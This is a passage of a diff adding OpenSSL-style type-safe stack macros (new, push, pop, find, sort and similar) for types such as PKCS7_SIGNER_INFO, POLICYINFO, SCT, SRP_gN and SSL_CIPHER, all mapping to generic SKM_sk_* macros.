+# define sk_PKCS7_SIGNER_INFO_new_null() SKM_sk_new_null(PKCS7_SIGNER_INFO)
+# define sk_PKCS7_SIGNER_INFO_free(st) SKM_sk_free(PKCS7_SIGNER_INFO, (st))
+# define sk_PKCS7_SIGNER_INFO_num(st) SKM_sk_num(PKCS7_SIGNER_INFO, (st))
+# define sk_PKCS7_SIGNER_INFO_value(st, i) SKM_sk_value(PKCS7_SIGNER_INFO, (st), (i))
+# define sk_PKCS7_SIGNER_INFO_set(st, i, val) SKM_sk_set(PKCS7_SIGNER_INFO, (st), (i), (val))
+# define sk_PKCS7_SIGNER_INFO_zero(st) SKM_sk_zero(PKCS7_SIGNER_INFO, (st))
+# define sk_PKCS7_SIGNER_INFO_push(st, val) SKM_sk_push(PKCS7_SIGNER_INFO, (st), (val))
+# define sk_PKCS7_SIGNER_INFO_unshift(st, val) SKM_sk_unshift(PKCS7_SIGNER_INFO, (st), (val))
+# define sk_PKCS7_SIGNER_INFO_find(st, val) SKM_sk_find(PKCS7_SIGNER_INFO, (st), (val))
+# define sk_PKCS7_SIGNER_INFO_find_ex(st, val) SKM_sk_find_ex(PKCS7_SIGNER_INFO, (st), (val))
+# define sk_PKCS7_SIGNER_INFO_delete(st, i) SKM_sk_delete(PKCS7_SIGNER_INFO, (st), (i))
+# define sk_PKCS7_SIGNER_INFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(PKCS7_SIGNER_INFO, (st), (ptr))
+# define sk_PKCS7_SIGNER_INFO_insert(st, val, i) SKM_sk_insert(PKCS7_SIGNER_INFO, (st), (val), (i))
+# define sk_PKCS7_SIGNER_INFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(PKCS7_SIGNER_INFO, (st), (cmp))
+# define sk_PKCS7_SIGNER_INFO_dup(st) SKM_sk_dup(PKCS7_SIGNER_INFO, st)
+# define sk_PKCS7_SIGNER_INFO_pop_free(st, free_func) SKM_sk_pop_free(PKCS7_SIGNER_INFO, (st), (free_func))
+# define sk_PKCS7_SIGNER_INFO_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(PKCS7_SIGNER_INFO, (st), (copy_func), (free_func))
+# define sk_PKCS7_SIGNER_INFO_shift(st) SKM_sk_shift(PKCS7_SIGNER_INFO, (st))
+# define sk_PKCS7_SIGNER_INFO_pop(st) SKM_sk_pop(PKCS7_SIGNER_INFO, (st))
+# define sk_PKCS7_SIGNER_INFO_sort(st) SKM_sk_sort(PKCS7_SIGNER_INFO, (st))
+# define sk_PKCS7_SIGNER_INFO_is_sorted(st) SKM_sk_is_sorted(PKCS7_SIGNER_INFO, (st))
+# define sk_POLICYINFO_new(cmp) SKM_sk_new(POLICYINFO, (cmp))
+# define sk_POLICYINFO_new_null() SKM_sk_new_null(POLICYINFO)
+# define sk_POLICYINFO_free(st) SKM_sk_free(POLICYINFO, (st))
+# define sk_POLICYINFO_num(st) SKM_sk_num(POLICYINFO, (st))
+# define sk_POLICYINFO_value(st, i) SKM_sk_value(POLICYINFO, (st), (i))
+# define sk_POLICYINFO_set(st, i, val) SKM_sk_set(POLICYINFO, (st), (i), (val))
+# define sk_POLICYINFO_zero(st) SKM_sk_zero(POLICYINFO, (st))
+# define sk_POLICYINFO_push(st, val) SKM_sk_push(POLICYINFO, (st), (val))
+# define sk_POLICYINFO_unshift(st, val) SKM_sk_unshift(POLICYINFO, (st), (val))
+# define sk_POLICYINFO_find(st, val) SKM_sk_find(POLICYINFO, (st), (val))
+# define sk_POLICYINFO_find_ex(st, val) SKM_sk_find_ex(POLICYINFO, (st), (val))
+# define sk_POLICYINFO_delete(st, i) SKM_sk_delete(POLICYINFO, (st), (i))
+# define sk_POLICYINFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(POLICYINFO, (st), (ptr))
+# define sk_POLICYINFO_insert(st, val, i) SKM_sk_insert(POLICYINFO, (st), (val), (i))
+# define sk_POLICYINFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(POLICYINFO, (st), (cmp))
+# define sk_POLICYINFO_dup(st) SKM_sk_dup(POLICYINFO, st)
+# define sk_POLICYINFO_pop_free(st, free_func) SKM_sk_pop_free(POLICYINFO, (st), (free_func))
+# define sk_POLICYINFO_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(POLICYINFO, (st), (copy_func), (free_func))
+# define sk_POLICYINFO_shift(st) SKM_sk_shift(POLICYINFO, (st))
+# define sk_POLICYINFO_pop(st) SKM_sk_pop(POLICYINFO, (st))
+# define sk_POLICYINFO_sort(st) SKM_sk_sort(POLICYINFO, (st))
+# define sk_POLICYINFO_is_sorted(st) SKM_sk_is_sorted(POLICYINFO, (st))
+# define sk_POLICYQUALINFO_new(cmp) SKM_sk_new(POLICYQUALINFO, (cmp))
+# define sk_POLICYQUALINFO_new_null() SKM_sk_new_null(POLICYQUALINFO)
+# define sk_POLICYQUALINFO_free(st) SKM_sk_free(POLICYQUALINFO, (st))
+# define sk_POLICYQUALINFO_num(st) SKM_sk_num(POLICYQUALINFO, (st))
+# define sk_POLICYQUALINFO_value(st, i) SKM_sk_value(POLICYQUALINFO, (st), (i))
+# define sk_POLICYQUALINFO_set(st, i, val) SKM_sk_set(POLICYQUALINFO, (st), (i), (val))
+# define sk_POLICYQUALINFO_zero(st) SKM_sk_zero(POLICYQUALINFO, (st))
+# define sk_POLICYQUALINFO_push(st, val) SKM_sk_push(POLICYQUALINFO, (st), (val))
+# define sk_POLICYQUALINFO_unshift(st, val) SKM_sk_unshift(POLICYQUALINFO, (st), (val))
+# define sk_POLICYQUALINFO_find(st, val) SKM_sk_find(POLICYQUALINFO, (st), (val))
+# define sk_POLICYQUALINFO_find_ex(st, val) SKM_sk_find_ex(POLICYQUALINFO, (st), (val))
+# define sk_POLICYQUALINFO_delete(st, i) SKM_sk_delete(POLICYQUALINFO, (st), (i))
+# define sk_POLICYQUALINFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(POLICYQUALINFO, (st), (ptr))
+# define sk_POLICYQUALINFO_insert(st, val, i) SKM_sk_insert(POLICYQUALINFO, (st), (val), (i))
+# define sk_POLICYQUALINFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(POLICYQUALINFO, (st), (cmp))
+# define sk_POLICYQUALINFO_dup(st) SKM_sk_dup(POLICYQUALINFO, st)
+# define sk_POLICYQUALINFO_pop_free(st, free_func) SKM_sk_pop_free(POLICYQUALINFO, (st), (free_func))
+# define sk_POLICYQUALINFO_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(POLICYQUALINFO, (st), (copy_func), (free_func))
+# define sk_POLICYQUALINFO_shift(st) SKM_sk_shift(POLICYQUALINFO, (st))
+# define sk_POLICYQUALINFO_pop(st) SKM_sk_pop(POLICYQUALINFO, (st))
+# define sk_POLICYQUALINFO_sort(st) SKM_sk_sort(POLICYQUALINFO, (st))
+# define sk_POLICYQUALINFO_is_sorted(st) SKM_sk_is_sorted(POLICYQUALINFO, (st))
+# define sk_POLICY_MAPPING_new(cmp) SKM_sk_new(POLICY_MAPPING, (cmp))
+# define sk_POLICY_MAPPING_new_null() SKM_sk_new_null(POLICY_MAPPING)
+# define sk_POLICY_MAPPING_free(st) SKM_sk_free(POLICY_MAPPING, (st))
+# define sk_POLICY_MAPPING_num(st) SKM_sk_num(POLICY_MAPPING, (st))
+# define sk_POLICY_MAPPING_value(st, i) SKM_sk_value(POLICY_MAPPING, (st), (i))
+# define sk_POLICY_MAPPING_set(st, i, val) SKM_sk_set(POLICY_MAPPING, (st), (i), (val))
+# define sk_POLICY_MAPPING_zero(st) SKM_sk_zero(POLICY_MAPPING, (st))
+# define sk_POLICY_MAPPING_push(st, val) SKM_sk_push(POLICY_MAPPING, (st), (val))
+# define sk_POLICY_MAPPING_unshift(st, val) SKM_sk_unshift(POLICY_MAPPING, (st), (val))
+# define sk_POLICY_MAPPING_find(st, val) SKM_sk_find(POLICY_MAPPING, (st), (val))
+# define sk_POLICY_MAPPING_find_ex(st, val) SKM_sk_find_ex(POLICY_MAPPING, (st), (val))
+# define sk_POLICY_MAPPING_delete(st, i) SKM_sk_delete(POLICY_MAPPING, (st), (i))
+# define sk_POLICY_MAPPING_delete_ptr(st, ptr) SKM_sk_delete_ptr(POLICY_MAPPING, (st), (ptr))
+# define sk_POLICY_MAPPING_insert(st, val, i) SKM_sk_insert(POLICY_MAPPING, (st), (val), (i))
+# define sk_POLICY_MAPPING_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(POLICY_MAPPING, (st), (cmp))
+# define sk_POLICY_MAPPING_dup(st) SKM_sk_dup(POLICY_MAPPING, st)
+# define sk_POLICY_MAPPING_pop_free(st, free_func) SKM_sk_pop_free(POLICY_MAPPING, (st), (free_func))
+# define sk_POLICY_MAPPING_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(POLICY_MAPPING, (st), (copy_func), (free_func))
+# define sk_POLICY_MAPPING_shift(st) SKM_sk_shift(POLICY_MAPPING, (st))
+# define sk_POLICY_MAPPING_pop(st) SKM_sk_pop(POLICY_MAPPING, (st))
+# define sk_POLICY_MAPPING_sort(st) SKM_sk_sort(POLICY_MAPPING, (st))
+# define sk_POLICY_MAPPING_is_sorted(st) SKM_sk_is_sorted(POLICY_MAPPING, (st))
+# define sk_SCT_new(cmp) SKM_sk_new(SCT, (cmp))
+# define sk_SCT_new_null() SKM_sk_new_null(SCT)
+# define sk_SCT_free(st) SKM_sk_free(SCT, (st))
+# define sk_SCT_num(st) SKM_sk_num(SCT, (st))
+# define sk_SCT_value(st, i) SKM_sk_value(SCT, (st), (i))
+# define sk_SCT_set(st, i, val) SKM_sk_set(SCT, (st), (i), (val))
+# define sk_SCT_zero(st) SKM_sk_zero(SCT, (st))
+# define sk_SCT_push(st, val) SKM_sk_push(SCT, (st), (val))
+# define sk_SCT_unshift(st, val) SKM_sk_unshift(SCT, (st), (val))
+# define sk_SCT_find(st, val) SKM_sk_find(SCT, (st), (val))
+# define sk_SCT_find_ex(st, val) SKM_sk_find_ex(SCT, (st), (val))
+# define sk_SCT_delete(st, i) SKM_sk_delete(SCT, (st), (i))
+# define sk_SCT_delete_ptr(st, ptr) SKM_sk_delete_ptr(SCT, (st), (ptr))
+# define sk_SCT_insert(st, val, i) SKM_sk_insert(SCT, (st), (val), (i))
+# define sk_SCT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SCT, (st), (cmp))
+# define sk_SCT_dup(st) SKM_sk_dup(SCT, st)
+# define sk_SCT_pop_free(st, free_func) SKM_sk_pop_free(SCT, (st), (free_func))
+# define sk_SCT_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(SCT, (st), (copy_func), (free_func))
+# define sk_SCT_shift(st) SKM_sk_shift(SCT, (st))
+# define sk_SCT_pop(st) SKM_sk_pop(SCT, (st))
+# define sk_SCT_sort(st) SKM_sk_sort(SCT, (st))
+# define sk_SCT_is_sorted(st) SKM_sk_is_sorted(SCT, (st))
+# define sk_SRP_gN_new(cmp) SKM_sk_new(SRP_gN, (cmp))
+# define sk_SRP_gN_new_null() SKM_sk_new_null(SRP_gN)
+# define sk_SRP_gN_free(st) SKM_sk_free(SRP_gN, (st))
+# define sk_SRP_gN_num(st) SKM_sk_num(SRP_gN, (st))
+# define sk_SRP_gN_value(st, i) SKM_sk_value(SRP_gN, (st), (i))
+# define sk_SRP_gN_set(st, i, val) SKM_sk_set(SRP_gN, (st), (i), (val))
+# define sk_SRP_gN_zero(st) SKM_sk_zero(SRP_gN, (st))
+# define sk_SRP_gN_push(st, val) SKM_sk_push(SRP_gN, (st), (val))
+# define sk_SRP_gN_unshift(st, val) SKM_sk_unshift(SRP_gN, (st), (val))
+# define sk_SRP_gN_find(st, val) SKM_sk_find(SRP_gN, (st), (val))
+# define sk_SRP_gN_find_ex(st, val) SKM_sk_find_ex(SRP_gN, (st), (val))
+# define sk_SRP_gN_delete(st, i) SKM_sk_delete(SRP_gN, (st), (i))
+# define sk_SRP_gN_delete_ptr(st, ptr) SKM_sk_delete_ptr(SRP_gN, (st), (ptr))
+# define sk_SRP_gN_insert(st, val, i) SKM_sk_insert(SRP_gN, (st), (val), (i))
+# define sk_SRP_gN_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SRP_gN, (st), (cmp))
+# define sk_SRP_gN_dup(st) SKM_sk_dup(SRP_gN, st)
+# define sk_SRP_gN_pop_free(st, free_func) SKM_sk_pop_free(SRP_gN, (st), (free_func))
+# define sk_SRP_gN_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(SRP_gN, (st), (copy_func), (free_func))
+# define sk_SRP_gN_shift(st) SKM_sk_shift(SRP_gN, (st))
+# define sk_SRP_gN_pop(st) SKM_sk_pop(SRP_gN, (st))
+# define sk_SRP_gN_sort(st) SKM_sk_sort(SRP_gN, (st))
+# define sk_SRP_gN_is_sorted(st) SKM_sk_is_sorted(SRP_gN, (st))
+# define sk_SRP_gN_cache_new(cmp) SKM_sk_new(SRP_gN_cache, (cmp))
+# define sk_SRP_gN_cache_new_null() SKM_sk_new_null(SRP_gN_cache)
+# define sk_SRP_gN_cache_free(st) SKM_sk_free(SRP_gN_cache, (st))
+# define sk_SRP_gN_cache_num(st) SKM_sk_num(SRP_gN_cache, (st))
+# define sk_SRP_gN_cache_value(st, i) SKM_sk_value(SRP_gN_cache, (st), (i))
+# define sk_SRP_gN_cache_set(st, i, val) SKM_sk_set(SRP_gN_cache, (st), (i), (val))
+# define sk_SRP_gN_cache_zero(st) SKM_sk_zero(SRP_gN_cache, (st))
+# define sk_SRP_gN_cache_push(st, val) SKM_sk_push(SRP_gN_cache, (st), (val))
+# define sk_SRP_gN_cache_unshift(st, val) SKM_sk_unshift(SRP_gN_cache, (st), (val))
+# define sk_SRP_gN_cache_find(st, val) SKM_sk_find(SRP_gN_cache, (st), (val))
+# define sk_SRP_gN_cache_find_ex(st, val) SKM_sk_find_ex(SRP_gN_cache, (st), (val))
+# define sk_SRP_gN_cache_delete(st, i) SKM_sk_delete(SRP_gN_cache, (st), (i))
+# define sk_SRP_gN_cache_delete_ptr(st, ptr) SKM_sk_delete_ptr(SRP_gN_cache, (st), (ptr))
+# define sk_SRP_gN_cache_insert(st, val, i) SKM_sk_insert(SRP_gN_cache, (st), (val), (i))
+# define sk_SRP_gN_cache_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SRP_gN_cache, (st), (cmp))
+# define sk_SRP_gN_cache_dup(st) SKM_sk_dup(SRP_gN_cache, st)
+# define sk_SRP_gN_cache_pop_free(st, free_func) SKM_sk_pop_free(SRP_gN_cache, (st), (free_func))
+# define sk_SRP_gN_cache_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(SRP_gN_cache, (st), (copy_func), (free_func))
+# define sk_SRP_gN_cache_shift(st) SKM_sk_shift(SRP_gN_cache, (st))
+# define sk_SRP_gN_cache_pop(st) SKM_sk_pop(SRP_gN_cache, (st))
+# define sk_SRP_gN_cache_sort(st) SKM_sk_sort(SRP_gN_cache, (st))
+# define sk_SRP_gN_cache_is_sorted(st) SKM_sk_is_sorted(SRP_gN_cache, (st))
+# define sk_SRP_user_pwd_new(cmp) SKM_sk_new(SRP_user_pwd, (cmp))
+# define sk_SRP_user_pwd_new_null() SKM_sk_new_null(SRP_user_pwd)
+# define sk_SRP_user_pwd_free(st) SKM_sk_free(SRP_user_pwd, (st))
+# define sk_SRP_user_pwd_num(st) SKM_sk_num(SRP_user_pwd, (st))
+# define sk_SRP_user_pwd_value(st, i) SKM_sk_value(SRP_user_pwd, (st), (i))
+# define sk_SRP_user_pwd_set(st, i, val) SKM_sk_set(SRP_user_pwd, (st), (i), (val))
+# define sk_SRP_user_pwd_zero(st) SKM_sk_zero(SRP_user_pwd, (st))
+# define sk_SRP_user_pwd_push(st, val) SKM_sk_push(SRP_user_pwd, (st), (val))
+# define sk_SRP_user_pwd_unshift(st, val) SKM_sk_unshift(SRP_user_pwd, (st), (val))
+# define sk_SRP_user_pwd_find(st, val) SKM_sk_find(SRP_user_pwd, (st), (val))
+# define sk_SRP_user_pwd_find_ex(st, val) SKM_sk_find_ex(SRP_user_pwd, (st), (val))
+# define sk_SRP_user_pwd_delete(st, i) SKM_sk_delete(SRP_user_pwd, (st), (i))
+# define sk_SRP_user_pwd_delete_ptr(st, ptr) SKM_sk_delete_ptr(SRP_user_pwd, (st), (ptr))
+# define sk_SRP_user_pwd_insert(st, val, i) SKM_sk_insert(SRP_user_pwd, (st), (val), (i))
+# define sk_SRP_user_pwd_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SRP_user_pwd, (st), (cmp))
+# define sk_SRP_user_pwd_dup(st) SKM_sk_dup(SRP_user_pwd, st)
+# define sk_SRP_user_pwd_pop_free(st, free_func) SKM_sk_pop_free(SRP_user_pwd, (st), (free_func))
+# define sk_SRP_user_pwd_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(SRP_user_pwd, (st), (copy_func), (free_func))
+# define sk_SRP_user_pwd_shift(st) SKM_sk_shift(SRP_user_pwd, (st))
+# define sk_SRP_user_pwd_pop(st) SKM_sk_pop(SRP_user_pwd, (st))
+# define sk_SRP_user_pwd_sort(st) SKM_sk_sort(SRP_user_pwd, (st))
+# define sk_SRP_user_pwd_is_sorted(st) SKM_sk_is_sorted(SRP_user_pwd, (st))
+# define sk_SRTP_PROTECTION_PROFILE_new(cmp) SKM_sk_new(SRTP_PROTECTION_PROFILE, (cmp))
+# define sk_SRTP_PROTECTION_PROFILE_new_null() SKM_sk_new_null(SRTP_PROTECTION_PROFILE)
+# define sk_SRTP_PROTECTION_PROFILE_free(st) SKM_sk_free(SRTP_PROTECTION_PROFILE, (st))
+# define sk_SRTP_PROTECTION_PROFILE_num(st) SKM_sk_num(SRTP_PROTECTION_PROFILE, (st))
+# define sk_SRTP_PROTECTION_PROFILE_value(st, i) SKM_sk_value(SRTP_PROTECTION_PROFILE, (st), (i))
+# define sk_SRTP_PROTECTION_PROFILE_set(st, i, val) SKM_sk_set(SRTP_PROTECTION_PROFILE, (st), (i), (val))
+# define sk_SRTP_PROTECTION_PROFILE_zero(st) SKM_sk_zero(SRTP_PROTECTION_PROFILE, (st))
+# define sk_SRTP_PROTECTION_PROFILE_push(st, val) SKM_sk_push(SRTP_PROTECTION_PROFILE, (st), (val))
+# define sk_SRTP_PROTECTION_PROFILE_unshift(st, val) SKM_sk_unshift(SRTP_PROTECTION_PROFILE, (st), (val))
+# define sk_SRTP_PROTECTION_PROFILE_find(st, val) SKM_sk_find(SRTP_PROTECTION_PROFILE, (st), (val))
+# define sk_SRTP_PROTECTION_PROFILE_find_ex(st, val) SKM_sk_find_ex(SRTP_PROTECTION_PROFILE, (st), (val))
+# define sk_SRTP_PROTECTION_PROFILE_delete(st, i) SKM_sk_delete(SRTP_PROTECTION_PROFILE, (st), (i))
+# define sk_SRTP_PROTECTION_PROFILE_delete_ptr(st, ptr) SKM_sk_delete_ptr(SRTP_PROTECTION_PROFILE, (st), (ptr))
+# define sk_SRTP_PROTECTION_PROFILE_insert(st, val, i) SKM_sk_insert(SRTP_PROTECTION_PROFILE, (st), (val), (i))
+# define sk_SRTP_PROTECTION_PROFILE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SRTP_PROTECTION_PROFILE, (st), (cmp))
+# define sk_SRTP_PROTECTION_PROFILE_dup(st) SKM_sk_dup(SRTP_PROTECTION_PROFILE, st)
+# define sk_SRTP_PROTECTION_PROFILE_pop_free(st, free_func) SKM_sk_pop_free(SRTP_PROTECTION_PROFILE, (st), (free_func))
+# define sk_SRTP_PROTECTION_PROFILE_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(SRTP_PROTECTION_PROFILE, (st), (copy_func), (free_func))
+# define sk_SRTP_PROTECTION_PROFILE_shift(st) SKM_sk_shift(SRTP_PROTECTION_PROFILE, (st))
+# define sk_SRTP_PROTECTION_PROFILE_pop(st) SKM_sk_pop(SRTP_PROTECTION_PROFILE, (st))
+# define sk_SRTP_PROTECTION_PROFILE_sort(st) SKM_sk_sort(SRTP_PROTECTION_PROFILE, (st))
+# define sk_SRTP_PROTECTION_PROFILE_is_sorted(st) SKM_sk_is_sorted(SRTP_PROTECTION_PROFILE, (st))
+# define sk_SSL_CIPHER_new(cmp) SKM_sk_new(SSL_CIPHER, (cmp))
+# define sk_SSL_CIPHER_new_null() SKM_sk_new_null(SSL_CIPHER)
+# define sk_SSL_CIPHER_free(st) SKM_sk_free(SSL_CIPHER, (st))
+# define sk_SSL_CIPHER_num(st) SKM_sk_num(SSL_CIPHER, (st))
+# define sk_SSL_CIPHER_value(st, i) SKM_sk_value(SSL_CIPHER, (st), (i))
+# define sk_SSL_CIPHER_set(st, i, val) SKM_sk_set(SSL_CIPHER, (st), (i), (val))
+# define sk_SSL_CIPHER_zero(st) SKM_sk_zero(SSL_CIPHER, (st))
+# define sk_SSL_CIPHER_push(st, val) SKM_sk_push(SSL_CIPHER, (st), (val))
+# define sk_SSL_CIPHER_unshift(st, val) SKM_sk_unshift(SSL_CIPHER, (st), (val))
+# define sk_SSL_CIPHER_find(st, val) SKM_sk_find(SSL_CIPHER, (st), (val))
+# define sk_SSL_CIPHER_find_ex(st, val) SKM_sk_find_ex(SSL_CIPHER, (st), (val))
+# define sk_SSL_CIPHER_delete(st, i) SKM_sk_delete(SSL_CIPHER, (st), (i))
+# define sk_SSL_CIPHER_delete_ptr(st, ptr) SKM_sk_delete_ptr(SSL_CIPHER, (st), (ptr))
+# define sk_SSL_CIPHER_insert(st, val, i) SKM_sk_insert(SSL_CIPHER, (st), (val), (i))
+# define sk_SSL_CIPHER_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SSL_CIPHER, (st), (cmp))
+# define sk_SSL_CIPHER_dup(st) SKM_sk_dup(SSL_CIPHER, st)
+# define sk_SSL_CIPHER_pop_free(st, free_func) SKM_sk_pop_free(SSL_CIPHER, (st), (free_func))
+# define sk_SSL_CIPHER_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(SSL_CIPHER, (st), (copy_func), (free_func))
+# define sk_SSL_CIPHER_shift(st) SKM_sk_shift(SSL_CIPHER, (st))
+# define sk_SSL_CIPHER_pop(st) SKM_sk_pop(SSL_CIPHER, (st))
+# define sk_SSL_CIPHER_sort(st) SKM_sk_sort(SSL_CIPHER, (st))
+# define sk_SSL_CIPHER_is_sorted(st) SKM_sk_is_sorted(SSL_CIPHER, (st))
+# define sk_SSL_COMP_new(cmp) SKM_sk_new(SSL_COMP, (cmp))
+# define sk_SSL_COMP_new_null() SKM_sk_new_null(SSL_COMP)
+# define sk_SSL_COMP_free(st) SKM_sk_free(SSL_COMP, (st))
+# define sk_SSL_COMP_num(st) SKM_sk_num(SSL_COMP, (st))
+# define sk_SSL_COMP_value(st, i) SKM_sk_value(SSL_COMP, (st), (i))
+# define sk_SSL_COMP_set(st, i, val) SKM_sk_set(SSL_COMP, (st), (i), (val))
+# define sk_SSL_COMP_zero(st) SKM_sk_zero(SSL_COMP, (st))
+# define sk_SSL_COMP_push(st, val) SKM_sk_push(SSL_COMP, (st), (val))
+# define sk_SSL_COMP_unshift(st, val) SKM_sk_unshift(SSL_COMP, (st), (val))
+# define sk_SSL_COMP_find(st, val) SKM_sk_find(SSL_COMP, (st), (val))
+# define sk_SSL_COMP_find_ex(st, val) SKM_sk_find_ex(SSL_COMP, (st), (val))
+# define sk_SSL_COMP_delete(st, i) SKM_sk_delete(SSL_COMP, (st), (i))
+# define sk_SSL_COMP_delete_ptr(st, ptr) SKM_sk_delete_ptr(SSL_COMP, (st), (ptr))
+# define sk_SSL_COMP_insert(st, val, i) SKM_sk_insert(SSL_COMP, (st), (val), (i))
+# define sk_SSL_COMP_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SSL_COMP, (st), (cmp))
+# define sk_SSL_COMP_dup(st) SKM_sk_dup(SSL_COMP, st)
+# define sk_SSL_COMP_pop_free(st, free_func) SKM_sk_pop_free(SSL_COMP, (st), (free_func))
+# define sk_SSL_COMP_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(SSL_COMP, (st), (copy_func), (free_func))
+# define sk_SSL_COMP_shift(st) SKM_sk_shift(SSL_COMP, (st))
+# define sk_SSL_COMP_pop(st) SKM_sk_pop(SSL_COMP, (st))
+# define sk_SSL_COMP_sort(st) SKM_sk_sort(SSL_COMP, (st))
+# define sk_SSL_COMP_is_sorted(st) SKM_sk_is_sorted(SSL_COMP, (st))
+# define sk_STACK_OF_X509_NAME_ENTRY_new(cmp) SKM_sk_new(STACK_OF_X509_NAME_ENTRY, (cmp))
+# define sk_STACK_OF_X509_NAME_ENTRY_new_null() SKM_sk_new_null(STACK_OF_X509_NAME_ENTRY)
+# define sk_STACK_OF_X509_NAME_ENTRY_free(st) SKM_sk_free(STACK_OF_X509_NAME_ENTRY, (st))
+# define sk_STACK_OF_X509_NAME_ENTRY_num(st) SKM_sk_num(STACK_OF_X509_NAME_ENTRY, (st))
+# define sk_STACK_OF_X509_NAME_ENTRY_value(st, i) SKM_sk_value(STACK_OF_X509_NAME_ENTRY, (st), (i))
+# define sk_STACK_OF_X509_NAME_ENTRY_set(st, i, val) SKM_sk_set(STACK_OF_X509_NAME_ENTRY, (st), (i), (val))
+# define sk_STACK_OF_X509_NAME_ENTRY_zero(st) SKM_sk_zero(STACK_OF_X509_NAME_ENTRY, (st))
+# define sk_STACK_OF_X509_NAME_ENTRY_push(st, val) SKM_sk_push(STACK_OF_X509_NAME_ENTRY, (st), (val))
+# define sk_STACK_OF_X509_NAME_ENTRY_unshift(st, val) SKM_sk_unshift(STACK_OF_X509_NAME_ENTRY, (st), (val))
+# define sk_STACK_OF_X509_NAME_ENTRY_find(st, val) SKM_sk_find(STACK_OF_X509_NAME_ENTRY, (st), (val))
+# define sk_STACK_OF_X509_NAME_ENTRY_find_ex(st, val) SKM_sk_find_ex(STACK_OF_X509_NAME_ENTRY, (st), (val))
+# define sk_STACK_OF_X509_NAME_ENTRY_delete(st, i) SKM_sk_delete(STACK_OF_X509_NAME_ENTRY, (st), (i))
+# define sk_STACK_OF_X509_NAME_ENTRY_delete_ptr(st, ptr) SKM_sk_delete_ptr(STACK_OF_X509_NAME_ENTRY, (st), (ptr))
+# define sk_STACK_OF_X509_NAME_ENTRY_insert(st, val, i) SKM_sk_insert(STACK_OF_X509_NAME_ENTRY, (st), (val), (i))
+# define sk_STACK_OF_X509_NAME_ENTRY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(STACK_OF_X509_NAME_ENTRY, (st), (cmp))
+# define sk_STACK_OF_X509_NAME_ENTRY_dup(st) SKM_sk_dup(STACK_OF_X509_NAME_ENTRY, st)
+# define sk_STACK_OF_X509_NAME_ENTRY_pop_free(st, free_func) SKM_sk_pop_free(STACK_OF_X509_NAME_ENTRY, (st), (free_func))
+# define sk_STACK_OF_X509_NAME_ENTRY_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(STACK_OF_X509_NAME_ENTRY, (st), (copy_func), (free_func))
+# define sk_STACK_OF_X509_NAME_ENTRY_shift(st) SKM_sk_shift(STACK_OF_X509_NAME_ENTRY, (st))
+# define sk_STACK_OF_X509_NAME_ENTRY_pop(st) SKM_sk_pop(STACK_OF_X509_NAME_ENTRY, (st))
+# define sk_STACK_OF_X509_NAME_ENTRY_sort(st) SKM_sk_sort(STACK_OF_X509_NAME_ENTRY, (st))
+# define sk_STACK_OF_X509_NAME_ENTRY_is_sorted(st) SKM_sk_is_sorted(STACK_OF_X509_NAME_ENTRY, (st))
+# define sk_STORE_ATTR_INFO_new(cmp) SKM_sk_new(STORE_ATTR_INFO, (cmp))
+# define sk_STORE_ATTR_INFO_new_null() SKM_sk_new_null(STORE_ATTR_INFO)
+# define sk_STORE_ATTR_INFO_free(st) SKM_sk_free(STORE_ATTR_INFO, (st))
+# define sk_STORE_ATTR_INFO_num(st) SKM_sk_num(STORE_ATTR_INFO, (st))
+# define sk_STORE_ATTR_INFO_value(st, i) SKM_sk_value(STORE_ATTR_INFO, (st), (i))
+# define sk_STORE_ATTR_INFO_set(st, i, val) SKM_sk_set(STORE_ATTR_INFO, (st), (i), (val))
+# define sk_STORE_ATTR_INFO_zero(st) SKM_sk_zero(STORE_ATTR_INFO, (st))
+# define sk_STORE_ATTR_INFO_push(st, val) SKM_sk_push(STORE_ATTR_INFO, (st), (val))
+# define sk_STORE_ATTR_INFO_unshift(st, val) SKM_sk_unshift(STORE_ATTR_INFO, (st), (val))
+# define sk_STORE_ATTR_INFO_find(st, val) SKM_sk_find(STORE_ATTR_INFO, (st), (val))
+# define sk_STORE_ATTR_INFO_find_ex(st, val) SKM_sk_find_ex(STORE_ATTR_INFO, (st), (val))
+# define sk_STORE_ATTR_INFO_delete(st, i) SKM_sk_delete(STORE_ATTR_INFO, (st), (i))
+# define sk_STORE_ATTR_INFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(STORE_ATTR_INFO, (st), (ptr))
+# define sk_STORE_ATTR_INFO_insert(st, val, i) SKM_sk_insert(STORE_ATTR_INFO, (st), (val), (i))
+# define sk_STORE_ATTR_INFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(STORE_ATTR_INFO, (st), (cmp))
+# define sk_STORE_ATTR_INFO_dup(st) SKM_sk_dup(STORE_ATTR_INFO, st)
+# define sk_STORE_ATTR_INFO_pop_free(st, free_func) SKM_sk_pop_free(STORE_ATTR_INFO, (st), (free_func))
+# define sk_STORE_ATTR_INFO_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(STORE_ATTR_INFO, (st), (copy_func), (free_func))
+# define sk_STORE_ATTR_INFO_shift(st) SKM_sk_shift(STORE_ATTR_INFO, (st))
